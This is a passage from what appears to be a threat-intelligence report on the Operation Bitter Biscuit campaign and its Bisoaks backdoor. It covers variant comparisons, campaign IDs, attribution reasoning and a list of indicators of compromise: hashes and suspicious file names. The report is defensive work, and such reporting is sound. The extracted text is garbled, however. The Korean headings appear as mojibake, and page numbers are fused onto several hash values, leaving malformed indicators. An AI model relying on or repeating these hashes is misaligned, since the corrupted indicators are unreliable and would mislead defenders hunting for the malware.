As shown in [Figure 2-12], the code found in September 2014 and the malicious code found in March 2018 share the same characteristics.
Figure 2-12 | Comparison between the September 2014 variant and the March 2018 variant
Meanwhile, Bisoaks malware includes a campaign ID; the variants found in Korea carry IDs such as 0903, 0917, 1016-02, 443, pmo, hjing, 24-kncck, 8000, 95, and 48. There are a total of 29 variants of the backdoor, and related variants have existed since September 2014. Therefore, this attacker can be assumed to have been active in Korea for at least four years.
Although it is unclear whether the Operation Bitter Biscuit attacks are carried out by a single group, judging from the attack trend over the years, Bisoaks malware can also be seen as malware related to Operation Bitter Biscuit, because Bisoaks malware has been used in Operation Bitter Biscuit attacks since 2014. [Figure 2-13] lists the malicious code used in Operation Bitter Biscuit as of 2018.
Figure 2-13 | Types of malware related to Operation Bitter Biscuit
05. Conclusion
Operation Bitter Biscuit, which had gone quiet after the fall of 2017, resumed attacks on major domestic institutions starting in March 2018. Whereas up to 2017 the attacks were mainly directed at domestic military companies and defense contractors, in 2018 they concentrated on the maritime sector, so the attacker appears to have broadened its targets. Although it has not been confirmed that these are the same group, the similarity of the malware used in the attacks suggests that the actor behind the attacks confirmed in the spring of 2018 has been attacking domestic government institutions since at least 2014.
An unidentified threat that has been targeting Korea for nearly ten years is still quietly attacking major domestic institutions and companies. In 2018 it focused only on the maritime sector, but which sector it will choose as its new target in 2019 remains to be seen, and the future course of Operation Bitter Biscuit must be watched closely.
06. IoC (Indicators of Compromise)
Dropper
504드ë¡í¼(Dropper)
5051cd5a3e42e9fa36c342a2a4ea85feeb4 bbfcb2d66784c0f7afc334f18a0866a7 e3bac3712aaca2881d1f82225bb75860
Downloader
507다운로ë”(Downloader)
50800c479bf76dc90db51209d2fa2a9cf6a 2c0522a805fa845ec9385eb5400e8d16 40f69d52559610d1f34f95e7a2c7924c
509410a19c9e5d6269e0d690307787e5fea 46224c767a6c2765738a00bb9d797814 862f3c0bd6c1ecee39442271df6e954d
510b13429ccf79d94a82dab0b30e0789227 d198e4632f9c4b9a3efbd6b1ed378d26 ef3103a76e101f7f19541d1cbbd2bd13
511f61c3f0eb173b2c5f38a1c9d5acda0dc fd45ecc5b111948507ace52fc95253ae
Backdoor
URL information
File names
chrome.exe conhost.exe contray.exe
msupdata.exe msviewer.exe serv.exe
services.exe taskhost.exe (file length of 100 MB or more)